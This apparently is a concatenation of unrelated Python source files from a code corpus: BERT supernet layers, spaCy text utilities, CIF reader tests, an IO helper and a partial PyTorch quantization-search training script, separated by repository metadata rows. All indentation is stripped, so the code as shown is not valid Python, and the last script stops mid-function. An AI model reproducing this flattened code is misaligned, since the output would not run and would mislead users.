return outputs
def set_sample_config(self, bert_hidden_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_num_attention_heads= bert_head_num
self.self.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
self.output.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
class BertIntermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
self.sample_hidden_size = None
self.sample_intermediate_size = None
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
def set_sample_config(self, bert_hidden_size, bert_intermediate_size):
self.sample_hidden_size = bert_hidden_size
self.sample_intermediate_size = bert_intermediate_size
self.dense.set_sample_config(self.sample_hidden_size, self.sample_intermediate_size)
class BertOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.intermediate_size, config.hidden_size)
self.LayerNorm = SuperLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.sample_hidden_size = None
self.sample_intermediate_size = None
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
def set_sample_config(self, bert_hidden_size, bert_intermediate_size):
self.sample_hidden_size = bert_hidden_size
self.sample_intermediate_size = bert_intermediate_size
self.dense.set_sample_config(self.sample_intermediate_size, self.sample_hidden_size)
self.LayerNorm.set_sample_config(self.sample_hidden_size)
class BertLayer(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = BertAttention(config)
self.is_decoder = config.is_decoder
self.add_cross_attention = config.add_cross_attention
if self.add_cross_attention:
assert self.is_decoder, f"{self} should be used as a decoder model if cross attention is added"
self.crossattention = BertAttention(config)
self.intermediate = BertIntermediate(config)
self.output = BertOutput(config)
self.sample_hidden_size = None
self.sample_intermediate_size = None
self.sample_num_attention_heads = None
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:]
if self.is_decoder and encoder_hidden_states is not None:
assert hasattr(
self, "crossattention"
), f"If `encoder_hidden_states` are passed, {self} has to be instantiated with cross-attention layers by setting `config.add_cross_attention=True`"
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:]
layer_output = apply_chunking_to_forward(
self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
)
outputs = (layer_output,) + outputs
return outputs
def feed_forward_chunk(self, attention_output):
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
def set_sample_config(self, bert_hidden_size, bert_intermediate_size, bert_head_num):
self.sample_hidden_size = bert_hidden_size
self.sample_intermediate_size = bert_intermediate_size
self.sample_num_attention_heads = bert_head_num
self.attention.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
if self.add_cross_attention:
assert self.is_decoder, f"{self} should be used as a decoder model if cross attention is added"
self.crossattention.set_sample_config(self.sample_hidden_size, self.sample_num_attention_heads)
self.intermediate.set_sample_config(self.sample_hidden_size, self.sample_intermediate_size)
self.output.set_sample_config(self.sample_hidden_size, self.sample_intermediate_size)
class BertEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.layer = nn.ModuleList([BertLayer(config) for _ in range(config.num_hidden_layers)])
self.sample_config = None
self.sample_num_layer = None
self.sample_hidden_size = None
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
output_hidden_states=False,
):
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
for i in range(self.sample_num_layer):
layer_module = self.layer[i]
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if output_hidden_states:
outputs = outputs + (all_hidden_states,)
if output_attentions:
outputs = outputs + (all_self_attentions,)
return outputs
def set_sample_config(self, sample_config):
self.sample_config = sample_config
self.sample_num_layer = sample_config['common']["bert_layer_num"]
self.sample_hidden_size = sample_config['common']["bert_hidden_size"]
for i in range(self.sample_num_layer):
tmp_layer = self.layer[i]
index_str = 'layer'+str(i+1)
sample_intermediate_size = sample_config[index_str]['bert_intermediate_size']
sample_num_attention_heads = sample_config[index_str]['bert_head_num']
tmp_layer.set_sample_config(self.sample_hidden_size, sample_intermediate_size, sample_num_attention_heads)
class BertPooler(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = SuperLinear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
self.sample_hidden_size = None
def forward(self, hidden_states):
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
def set_sample_config(self, bert_hidden_size):
self.sample_hidden_size = bert_hidden_size
self.dense.set_sample_config(self.sample_hidden_size, self.sample_hidden_size)
class BertPreTrainedModel(PreTrainedModel):
config_class = BertConfig
load_tf_weights = load_tf_weights_in_bert
base_model_prefix = "bert"
authorized_missing_keys = [r"position_ids"]
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, (SuperEmbedding, SuperLinear)):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, SuperLayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, SuperLinear) and module.bias is not None:
module.bias.data.zero_()
class BertModel(BertPreTrainedModel):
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = BertEmbeddings(config)
self.encoder = BertEncoder(config)
self.pooler = BertPooler(config) if add_pooling_layer else None
self.init_weights()
self.sample_config = None
self.sample_hidden_size = None
self.add_pooling_layer = add_pooling_layer
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=None,
output_hidden_states=None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if attention_mask is None:
attention_mask = torch.ones(input_shape, device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
outputs = (sequence_output, pooled_output,) + encoder_outputs[1:]
return outputs
def set_sample_config(self, sample_config):
self.sample_config = sample_config
self.sample_hidden_size = sample_config['common']["bert_hidden_size"]
self.embeddings.set_sample_config(self.sample_hidden_size)
self.encoder.set_sample_config(self.sample_config)
if self.add_pooling_layer:
self.pooler.set_sample_config(self.sample_hidden_size)
class BertForSequenceClassification(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = BertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = SuperLinear(config.hidden_size, config.num_labels)
self.init_weights()
self.sample_config = None
self.sample_hidden_size = None
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
labels=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
):
outputs = self.bert(
input_ids,
attention_mask = attention_mask,
token_type_ids = token_type_ids,
position_ids = position_ids,
head_mask = head_mask,
inputs_embeds = inputs_embeds,
output_attentions = output_attentions,
output_hidden_states = output_hidden_states,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
outputs = (logits,) + outputs[2:]
loss = None
if labels is not None:
if self.num_labels == 1:
loss_fct = MSELoss()
loss = loss_fct(logits.view(-1), labels.view(-1))
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
outputs = (loss,) + outputs
return outputs
def set_sample_config(self, sample_config):
self.sample_config = sample_config
self.sample_hidden_size = sample_config['common']["bert_hidden_size"]
self.bert.set_sample_config(self.sample_config)
self.classifier.set_sample_config(self.sample_hidden_size, self.num_labels)
def get_sampled_params_numel(self, config):
self.set_sample_config(config)
numels = []
for name, module in self.named_modules():
if hasattr(module, 'calc_sampled_param_num'):
if name == 'classifier':
continue
if name.split('.')[1] == 'encoder' and eval(name.split('.')[3]) + 1 > config['common']['bert_layer_num']:
continue
numels.append(module.calc_sampled_param_num())
return sum(numels)
def profile(self, mode = True):
for module in self.modules():
if hasattr(module, 'profile') and self != module:
module.profile(mode)
| 35.968707
| 159
| 0.689413
|
c67c5fce4a1db4284c2b998cd9ee1376ba526bde
| 1,073
|
py
|
Python
|
text_complexity_analyzer_cm/utils/utils.py
|
seduerr91/persuasiveness-metric
|
ea1c0cffe5a3fd9d2e423e54b35942127fe94b97
|
[
"MIT"
] | 1
|
2022-03-08T21:31:23.000Z
|
2022-03-08T21:31:23.000Z
|
text_complexity_analyzer_cm/utils/utils.py
|
seduerr91/persuasiveness-metric
|
ea1c0cffe5a3fd9d2e423e54b35942127fe94b97
|
[
"MIT"
] | null | null | null |
text_complexity_analyzer_cm/utils/utils.py
|
seduerr91/persuasiveness-metric
|
ea1c0cffe5a3fd9d2e423e54b35942127fe94b97
|
[
"MIT"
] | null | null | null |
import spacy
from spacy.tokens import Doc
from spacy.tokens import Span
from spacy.tokens import Token
from typing import List
from text_complexity_analyzer_cm.constants import ACCEPTED_LANGUAGES
def split_text_into_paragraphs(text: str) -> List[str]:
text_aux = text.strip()
paragraphs = text_aux.split('\n\n') # Strip any leading whitespaces
for p in paragraphs:
p = p.strip()
return [p.strip() for p in paragraphs if len(p) > 0] # Don't count empty paragraphs
def split_text_into_sentences(text: str) -> List[str]:
nlp = spacy.load('en_core_web_sm', disable=['tagger', 'parser', 'ner'])
nlp.add_pipe('sentencizer')
text_spacy = nlp(text)
return [str(sentence) for sentence in text_spacy.sents]
def is_content_word(token: Token) -> bool:
result = token.is_alpha and token.pos_ in ['PROPN', 'NOUN', 'VERB', 'ADJ', 'ADV']
return result
def is_word(token: Token) -> bool:
return token.is_alpha
def split_doc_into_sentences(doc: Doc) -> List[Span]:
return [s for s in doc.sents if len(s.text.strip()) > 0]
| 29
| 87
| 0.702703
|
1717adcfa9b8ddee2f36bb1a7e12d032dd9d49ec
| 4,064
|
py
|
Python
|
test/test_CifFileReader.py
|
PDBeurope/pdbecif
|
cd5319b416260b8e13485548f6a40bb9e3856e19
|
[
"Apache-2.0"
] | 15
|
2020-05-18T22:30:05.000Z
|
2022-03-28T10:57:25.000Z
|
test/test_CifFileReader.py
|
SuperXiang/pdbecif
|
cd5319b416260b8e13485548f6a40bb9e3856e19
|
[
"Apache-2.0"
] | 1
|
2021-05-13T03:13:02.000Z
|
2021-05-13T03:13:02.000Z
|
test/test_CifFileReader.py
|
SuperXiang/pdbecif
|
cd5319b416260b8e13485548f6a40bb9e3856e19
|
[
"Apache-2.0"
] | 1
|
2022-02-08T08:24:30.000Z
|
2022-02-08T08:24:30.000Z
|
import os
import unittest
import pdbecif.mmcif_io as mmcif_IO
from pdbecif.mmcif import CifFile, CIFWrapper
class CifFileReaderTestCase(unittest.TestCase):
def setUp(self):
self.FILE_ROOT = os.path.dirname(os.path.abspath(__file__))
self.TEST_CIF_FILE = os.path.join(self.FILE_ROOT, "test_data/usage-example.cif")
self.TEST_DIC_FILE = os.path.join(self.FILE_ROOT, "test_data/usage-example.dic")
self.TEST_CSD_CIF_FILE = os.path.join(self.FILE_ROOT, "test_data/test_csd.cif")
def __assertEqual(self, l1, l2, msg):
if isinstance(l1, list):
l1.sort()
if isinstance(l2, list):
l2.sort()
return self.assertEqual(l1, l2, msg)
def test_inData_outDict(self):
cfr = mmcif_IO.CifFileReader(input="data", preserve_order=True)
cif_dictionary = cfr.read(self.TEST_CIF_FILE, output="cif_dictionary")
self.assertIsInstance(
cif_dictionary, dict, "Failed to create python dictionary from cif file"
)
self.__assertEqual(
list(cif_dictionary.keys()),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_dictionary["BLOCK_2"]["_extra"]["strange_value"],
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_inData_outWrap(self):
cfr = mmcif_IO.CifFileReader(input="data", preserve_order=True)
cif_wrapper = cfr.read(self.TEST_CIF_FILE, output="cif_wrapper")
self.assertIsInstance(
cif_wrapper["TEST_CIF"],
CIFWrapper,
"Failed to create CIFWrapper using lexical parser",
)
self.__assertEqual(
list(cif_wrapper.keys()),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_wrapper["BLOCK_2"]._extra.strange_value[0],
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_inData_outFile(self):
cfr = mmcif_IO.CifFileReader(input="data", preserve_order=True)
cif_file = cfr.read(self.TEST_CIF_FILE, output="cif_file")
self.assertIsInstance(
cif_file, CifFile, "Failed to create CifFile using algorithmic parser"
)
self.__assertEqual(
cif_file.getDataBlockIds(),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_file.getDataBlock("BLOCK_2")
.getCategory("_extra")
.getItem("strange_value")
.value,
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_inDict_outFile(self):
cfr = mmcif_IO.CifFileReader(input="dictionary", preserve_order=True)
cif_file = cfr.read(self.TEST_CIF_FILE, output="cif_file")
self.assertIsInstance(
cif_file, CifFile, "Failed to create CifFile using lexical parser"
)
self.__assertEqual(
cif_file.getDataBlockIds(),
["TEST_CIF", "BLOCK_2"],
"DataBlocks not read correctly",
)
self.__assertEqual(
cif_file.getDataBlock("BLOCK_2")
.getCategory("_extra")
.getItem("strange_value")
.value,
"Three#Blind#Mice",
"All levels of CIF file not translated to dictionary correctly",
)
def test_cif_noCategory(self):
cfr = mmcif_IO.CifFileReader()
cif_dictionary = cfr.read(self.TEST_CSD_CIF_FILE, output="cif_dictionary")
self.assertIsInstance(cif_dictionary, dict)
first_key = list(cif_dictionary.keys())[0]
csd_content = cif_dictionary[first_key][""]
self.assertIsInstance(csd_content, dict)
self.assertEqual(len(csd_content), 13)
if __name__ == "__main__":
unittest.main()
| 35.33913
| 88
| 0.616388
|
40854b7a7256652d40ce8fbb75bc16713abc5c37
| 2,145
|
py
|
Python
|
spiral/utils/io.py
|
acdaniells/spiral
|
d78344007969d7c991216901b4a9d3ad7d768587
|
[
"BSD-3-Clause"
] | null | null | null |
spiral/utils/io.py
|
acdaniells/spiral
|
d78344007969d7c991216901b4a9d3ad7d768587
|
[
"BSD-3-Clause"
] | 1
|
2020-04-01T18:39:48.000Z
|
2020-04-01T18:39:48.000Z
|
spiral/utils/io.py
|
acdaniells/spiral
|
d78344007969d7c991216901b4a9d3ad7d768587
|
[
"BSD-3-Clause"
] | 1
|
2020-04-01T18:36:44.000Z
|
2020-04-01T18:36:44.000Z
|
"""
Spiral IO utility.
"""
from spiral.core.exc import SpiralError
import pandas as pd
import pkg_resources
def get_package_name() -> str:
"""
Get the package name.
Returns
-------
str
The package name.
"""
return __name__.split(".")[0]
def resource_exists(filename: str) -> bool:
"""
Check if a package resource exists.
Parameters
----------
filename : str
The filename.
Returns
-------
bool
True if the file exists otherwise False.
"""
return pkg_resources.resource_exists(get_package_name(), filename)
def resource_filename(filename: str) -> str:
"""
Check if a package resource exists.
Parameters
----------
filename : str
The filename.
Returns
-------
str
True if the file exists otherwise False.
"""
return pkg_resources.resource_filename(get_package_name(), filename)
def open_file(filename: str, compression: str = "infer"):
if filename.endswith(".gz"):
import gzip
with gzip.GzipFile(filename, "r") as fp:
return fp.read()
else:
with open(filename) as fp:
return fp.read()
def read_data(filename: str, compression="infer"):
from pathlib import Path
extensions = Path(filename).suffixes
if ".csv" in extensions:
return read_csv(filename, compression=compression)
elif ".json" in extensions or ".geojson" in extensions:
return read_json(filename, compression=compression)
else:
raise SpiralError(f"Unrecognised extension(s): {extensions}")
def read_csv(filename: str, **kwargs) -> pd.DataFrame:
"""
Read a CSV file into a data frame.
Parameters
----------
filename : str
The filename.
**kwargs
The keyword arguments for the pandas.read_csv call.
Returns
-------
DataFrame
A pandas DataFrame containing the CSV data.
"""
return pd.read_csv(filename, **kwargs)
def read_json(filename: str, compression="infer") -> dict:
import json
return json.loads(open_file(filename, compression))
| 19.678899
| 72
| 0.617249
|
4cd28db9c92a0decfcc7d935c58b6ed223ee9fb0
| 30,758
|
py
|
Python
|
search_attention.py
|
Euphoria16/GMPQ
|
f93f8428bc025e01ab01c8f8ffd1d551598f716a
|
[
"MIT"
] | 16
|
2021-08-05T17:12:36.000Z
|
2022-01-08T11:23:14.000Z
|
search_attention.py
|
Euphoria16/GMPQ
|
f93f8428bc025e01ab01c8f8ffd1d551598f716a
|
[
"MIT"
] | 2
|
2021-08-17T01:37:38.000Z
|
2021-11-29T10:34:11.000Z
|
search_attention.py
|
Euphoria16/GMPQ
|
f93f8428bc025e01ab01c8f8ffd1d551598f716a
|
[
"MIT"
] | 2
|
2021-08-06T03:38:01.000Z
|
2021-08-21T07:36:01.000Z
|
import argparse
import os
import random
import shutil
import time
import warnings
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
import torch.multiprocessing as mp
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import models as models
from aircraft import Aircraft
import torch.nn.functional as F
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
parser = argparse.ArgumentParser(description='PyTorch ImageNet Training')
parser.add_argument('data', metavar='DIR',
help='path to dataset')
parser.add_argument('-a', '--arch', metavar='ARCH', default='resnet18',
choices=model_names,
help='model architecture: ' +
' | '.join(model_names) +
' (default: resnet18)')
parser.add_argument('-fa', '--fullarch', metavar='FULLARCH', default='qresnet18',
choices=model_names,
help='full model architecture: ' +
' | '.join(model_names) +
' (default: qresnet18)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--step-epoch', default=30, type=int, metavar='N',
help='number of epochs to decay learning rate')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=256, type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate', dest='lr')
parser.add_argument('--lra', '--learning-rate-alpha', default=0.01, type=float,
metavar='LR', help='initial alpha learning rate')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--aux-weight', '--aw', default=20, type=float, metavar='W',
help='attribution loss weight')
parser.add_argument('--pnorm', default=3, type=int, metavar='W',
help='p-norm')
parser.add_argument('--product', default=24, type=float, metavar='W',
help='product for p-norm')
parser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('--complexity-decay', '--cd', default=0, type=float,
metavar='W', help='complexity decay (default: 1e-4)')
parser.add_argument('-p', '--print-freq', default=100, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument('--dataname', default='imagenet', type=str,
help='dataset name')
parser.add_argument('--expname', default='exp', type=str,
help='exp name')
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training. ')
parser.add_argument('--gpu', default=None, type=int,
help='GPU id to use.')
parser.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
best_acc1 = 0
def main():
args = parser.parse_args()
print(args)
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
if args.gpu is not None:
warnings.warn('You have chosen a specific GPU. This will completely '
'disable data parallelism.')
if args.dist_url == "env://" and args.world_size == -1:
args.world_size = int(os.environ["WORLD_SIZE"])
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
ngpus_per_node = torch.cuda.device_count()
print('ngpus_per_node',ngpus_per_node)
if args.multiprocessing_distributed:
# Since we have ngpus_per_node processes per node, the total world_size
# needs to be adjusted accordingly
args.world_size = ngpus_per_node * args.world_size
# Use torch.multiprocessing.spawn to launch distributed processes: the
# main_worker process function
mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
# Simply call main_worker function
main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, args):
global best_acc1
args.gpu = gpu
if args.gpu is not None:
print("Use GPU: {} for training".format(args.gpu))
if args.distributed:
if args.dist_url == "env://" and args.rank == -1:
args.rank = int(os.environ["RANK"])
if args.multiprocessing_distributed:
# For multiprocessing distributed training, rank needs to be the
# global rank among all the processes
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
# create model
print("=> creating model '{}'".format(args.arch))
if args.dataname=='cifar10':
num_classes=10
elif args.dataname=='imagenet':
num_classes=1000
elif args.dataname=='flower':
num_classes=102
elif args.dataname=='aircraft':
num_classes=100
elif args.dataname=='cub':
num_classes=200
elif args.dataname=='cars':
num_classes=196
elif args.dataname=='food':
num_classes=101
elif args.dataname == 'pets':
num_classes = 37
else:
raise NotImplementedError
model = models.__dict__[args.arch](num_classes=num_classes)
full_model = models.__dict__[args.fullarch](pretrained=args.pretrained,num_classes=num_classes)
if args.distributed:
# For multiprocessing distributed, DistributedDataParallel constructor
# should always set the single device scope, otherwise,
# DistributedDataParallel will use all available devices.
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
model.cuda(args.gpu)
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
args.batch_size = int(args.batch_size / ngpus_per_node)
args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
else:
model.cuda()
# DistributedDataParallel will divide and allocate batch_size to all
# available GPUs if device_ids are not set
model = torch.nn.parallel.DistributedDataParallel(model)
elif args.gpu is not None:
torch.cuda.set_device(args.gpu)
model = model.cuda(args.gpu)
else:
# DataParallel will divide and allocate batch_size to all available GPUs
if 'alex' in args.arch or 'vgg' in args.arch:
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
full_model =torch.nn.DataParallel(full_model).cuda()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(args.gpu)
# group model/architecture parameters
params, alpha_params = [], []
for name, param in model.named_parameters():
if 'alpha' in name:
alpha_params += [param]
else:
params += [param]
optimizer = torch.optim.SGD(params, args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
arch_optimizer = torch.optim.SGD(alpha_params, args.lra, momentum=args.momentum,
weight_decay=args.weight_decay)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
if args.gpu is None:
checkpoint = torch.load(args.resume)
else:
# Map model to be loaded to specified single gpu.
loc = 'cuda:{}'.format(args.gpu)
checkpoint = torch.load(args.resume, map_location=loc)
args.start_epoch = checkpoint['epoch']
best_acc1 = checkpoint['best_acc1']
if args.gpu is not None:
# best_acc1 may be from a checkpoint from a different GPU
best_acc1 = best_acc1.to(args.gpu)
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
arch_optimizer.load_state_dict(checkpoint['arch_optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
cudnn.benchmark = True
# Data loading code
if args.dataname == 'imagenet':
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
if 'inception' in args.arch:
crop_size, short_size = 299, 342
else:
crop_size, short_size = 224, 256
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),
num_workers=args.workers, pin_memory=True, sampler=train_sampler)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, transforms.Compose([
transforms.Resize(short_size),
transforms.CenterCrop(crop_size),
transforms.ToTensor(),
normalize,
])),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
elif args.dataname == 'cifar10':
dataloader = datasets.CIFAR10
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = dataloader(root=args.data, train=True, download=True, transform=transform_train)
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=args.workers,
pin_memory=True)
testset = dataloader(root=args.data, train=False, download=True, transform=transform_test)
val_loader = torch.utils.data.DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=args.workers,
pin_memory=True)
elif args.dataname == 'flower':
train_transforms = transforms.Compose([
transforms.RandomRotation(30),
transforms.RandomResizedCrop(size=224),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
validation_transforms = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'valid')
train_data = datasets.ImageFolder(root=traindir, transform=train_transforms)
